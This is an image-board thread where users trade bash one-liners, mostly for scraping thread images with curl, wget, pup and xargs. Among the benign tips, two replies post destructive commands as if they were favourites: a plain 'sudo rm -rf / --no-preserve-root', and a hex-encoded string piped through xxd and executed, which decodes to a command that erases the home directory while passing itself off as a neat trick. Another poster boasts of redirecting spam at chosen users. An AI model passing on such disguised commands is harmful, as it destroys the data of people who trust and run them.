What are your favorite bash one-liners?

for i in `curl >>>/s/17026471 | grep -oE //i.4cdn.org/s/[0-9]+.jpg`; do wget https:$i; done
4chan fucked up the formatting, here we go
>>57092260
I know this is a one-liner thread, but make it a function, waay better:

pics() {
	link="https://boards.4chan.org/$1/thread/$2"
	for i in `curl $link | grep -oE "//i\.4cdn\.org/$1/[0-9]+\.jpg"`; do
		wget https:$i
	done
}
>>57092622
I fucked up, but, whatever
Bump

telnet towel.blinkenlights.nl
>>57092622
nice, dat code reuse
>>57092622
you should get a link as argument
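Taking that suggestion, a sketch of the same function with the full thread URL as its only argument (the board name is re-derived from the URL with cut; untested against the live site):

```shell
pics() {
    # $1: full thread URL, e.g. https://boards.4chan.org/g/thread/57092260
    board=$(printf '%s\n' "$1" | cut -d/ -f4)   # 4th /-separated field is the board
    for i in $(curl -s "$1" | grep -oE "//i\.4cdn\.org/$board/[0-9]+\.jpg"); do
        wget "https:$i"
    done
}
```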
>>57092260
>not using "$( )" notation
Why do people still use backticks?
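The practical difference shows up with nesting: backticks have to be escaped, $( ) just nests. A throwaway illustration:

```shell
# Nesting with backticks requires escaping the inner pair:
outer=`echo \`echo inner\``
# $() nests cleanly, no escaping needed:
outer2=$(echo $(echo inner))
echo "$outer / $outer2"   # prints: inner / inner
```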
>>57092646
>telnet towel.blinkenlights.nl
That's so cool
REMINDER TO NEVER COPY ANYTHING YOU FIND ON 4CHAN AND PASTE IT ONTO YOUR TERMINAL
http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt
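The trick in that link is hiding extra input inside what you copy; a harmless way to see it is to pipe any pasted text through cat -A (GNU coreutils) or od -c instead of executing it:

```shell
# A string that *looks* like one command but carries a hidden newline;
# most terminals would execute the first line immediately on paste.
payload='echo harmless
echo "and this line runs too"'
# Reveal control characters instead of running them: line ends show as $.
printf '%s' "$payload" | cat -A
```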
>>57092260

sudo rm -rf / --no-preserve-root
>>57095341
wow nice esoteric knowledge you've clearly been a unix power user for decades
>>57093804
it's in a lot of tutorials and example code. Monkey see monkey do.
I didn't even know about $() until this Thursday when backticks didn't work for me
Is this the new Bash thread?
Not exactly a one-liner, but it's something I made to get stuff from my home folder on my home server via scp without typing out the full path (~/music/* instead of /home/lolita/music/*). I mostly just use it with some Debian emulator on my phone.

export HOME=/path/to/home && scp -P <ssh-port> <username>@<host>:$1 $2 && export HOME=<default_home>
Stick it in /usr/local/bin (as, say, homescp) and then add

alias homescp='source homescp'

(to set global variables) and you've got a shit script that's only useful if you've got a shitty cheap Android like me.
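A sketch of the same idea as a function, so nothing has to mutate $HOME or be sourced at all; the user, host, and port values here are hypothetical placeholders, not from the post above:

```shell
# homescp: fetch a remote file by its ~/ path without typing the full path.
# user/host/port below are placeholder assumptions to fill in.
homescp() {
    user=lolita host=example.com port=22
    path="$1"
    case "$path" in
        "~/"*) path="/home/$user/${path#"~/"}" ;;   # expand leading ~/ to remote home
    esac
    scp -P "$port" "$user@$host:$path" "${2:-.}"
}
```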
>>57092260
this thread seems better than /sqt/ to ask this.
Is there a quick way in the terminal to check a whole list of plain-text files inside a directory, compare them, and output any line that repeats across different files? This with no input other than a directory or a list of files.
>>57095954

(for i in *; do sort <$i | uniq; done) | sort | uniq -d
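A quick way to see what that pipeline does: the per-file sort | uniq collapses repeats within each file, so the final uniq -d only reports lines that appear in more than one file.

```shell
# Two throwaway files sharing one line:
dir=$(mktemp -d) && cd "$dir"
printf 'alpha\nshared\n' > a.txt
printf 'beta\nshared\n'  > b.txt
(for i in *; do sort <"$i" | uniq; done) | sort | uniq -d   # prints: shared
```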
>>57092260
I would use an HTML CLI parser like pup to extract data from the HTML, as that regex only gets jpgs. Also you should consider using xargs wget instead of that ugly for construct.
>>57096053
I would just use wget -r to download 4chan.
>>57096053
Let's see your one-liner then
$(echo 726d202d7266207e0a | xxd -r -ps)
It looks kind of nice.
>>57096682

curl >>>/wg/6732906 | pup 'div[class="fileText"] a attr{href}' | awk '{print "https:" $1}' | xargs wget
pup is a nice CLI tool to extract tag-specific data from HTML, which is semantically more precise than regex. xargs -P $n wget speeds this up by launching $n processes at the same time. Look at how much cleaner it is: you can read it straight from left to right without keeping a mental note that this happens in a loop or something. I think xargs is preferable to for loops in that example.
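The parallelism is easy to see with a harmless stand-in for wget (sleep standing in for the download):

```shell
# Four fake "downloads", two at a time: with -P 2 this takes ~2s instead of ~4s.
printf '%s\n' one two three four |
    xargs -n 1 -P 2 sh -c 'sleep 1; echo "done: $0"'
```

Note it's capital -P for max parallel processes; lowercase -p makes xargs prompt before each command.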
>>57096771
Why don't you use the 4chan json API?
>>57096783
because that argument wasn't about what input to take, it was about how to process the filtered image links. of course you can use the API, but as a one-liner it's meant to be simple. using the API necessitates parsing the JSON, which is too complicated to achieve with grep. Of course you can parse the API JSON via CLI and an external tool (like I use pup to work with the HTML), but again, that wasn't the point.
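For what it's worth, the JSON side is also a one-tool job once you allow an external parser. A sketch of the jq filter against a hand-written sample of the API's shape (image posts carry `tim` and `ext` fields; the sample values here are made up):

```shell
# Sample of the thread-JSON shape; only posts with `tim` have an image.
json='{"posts":[{"no":1,"tim":1466666666000,"ext":".jpg"},{"no":2,"com":"text only"}]}'
printf '%s' "$json" |
    jq -r '.posts[] | select(.tim) | "https://i.4cdn.org/g/\(.tim)\(.ext)"'
# against the real endpoint you'd curl https://a.4cdn.org/<board>/thread/<no>.json
# and append | xargs wget
```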
>>57096754
kek
>>57092260
I have one set up that modifies our spam filters to send extra junk mail to user(s) I specify in the one-liner. I'd rather not post the whole script as it might get me in trouble.
>>57096771
this is nice, thanks for the breakdown